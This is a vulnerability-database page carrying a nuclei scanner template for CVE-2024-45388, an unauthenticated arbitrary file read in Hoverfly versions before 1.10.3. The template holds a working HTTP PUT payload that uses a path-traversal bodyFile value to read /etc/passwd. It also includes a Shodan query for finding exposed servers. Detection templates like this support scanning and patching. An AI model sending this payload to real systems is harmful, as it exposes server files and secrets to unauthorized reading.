Lucene search
K

Hoverfly < 1.10.3 - Arbitrary File Read

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 34 Views

Hoverfly < 1.10.3 allows arbitrary file read via /api/v2/simulation POST handle

Related
Refs
Code
id: CVE-2024-45388

info:
  name: Hoverfly < 1.10.3 - Arbitrary File Read
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.
  impact: |
    Unauthenticated attackers can read arbitrary files from the Hoverfly server including sensitive configuration data.
  remediation: |
    Update Hoverfly to version 1.10.3 or later.
  reference:
    - https://github.com/advisories/GHSA-6xx4-x46f-f897
    - https://nvd.nist.gov/vuln/detail/CVE-2024-45388
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2024-45388
    cwe-id: CWE-20
    epss-score: 0.55864
    epss-percentile: 0.98923
  metadata:
    max-request: 1
    verified: true
    shodan-query: http.favicon.hash:1357234275
  tags: cve,cve2024,hoverfly,lfi,intrusive,vkev,vuln

http:
  - raw:
      - |
        PUT /api/v2/simulation HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {"data":{"pairs":[{"request":{},"response":{"bodyFile": "../../../../../../../etc/passwd","x":"aaa"}} ]},"meta":{"schemaVersion":"v5.3"}}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
          - 'hoverflyVersion'
        condition: and

      - type: word
        part: header
        words:
          - application/json

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100bde7274a86bcdfc0b2b5fb5f2f04b81fb9577deadb7345b05fbe37f9185a806102200721081e72f7a1c7f73b4f1cc8e94778aed488df569855707f02ca905d70d69f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
6.1Medium risk
Vulners AI Score6.1
CVSS 3.17.5
EPSS0.55864
SSVC
34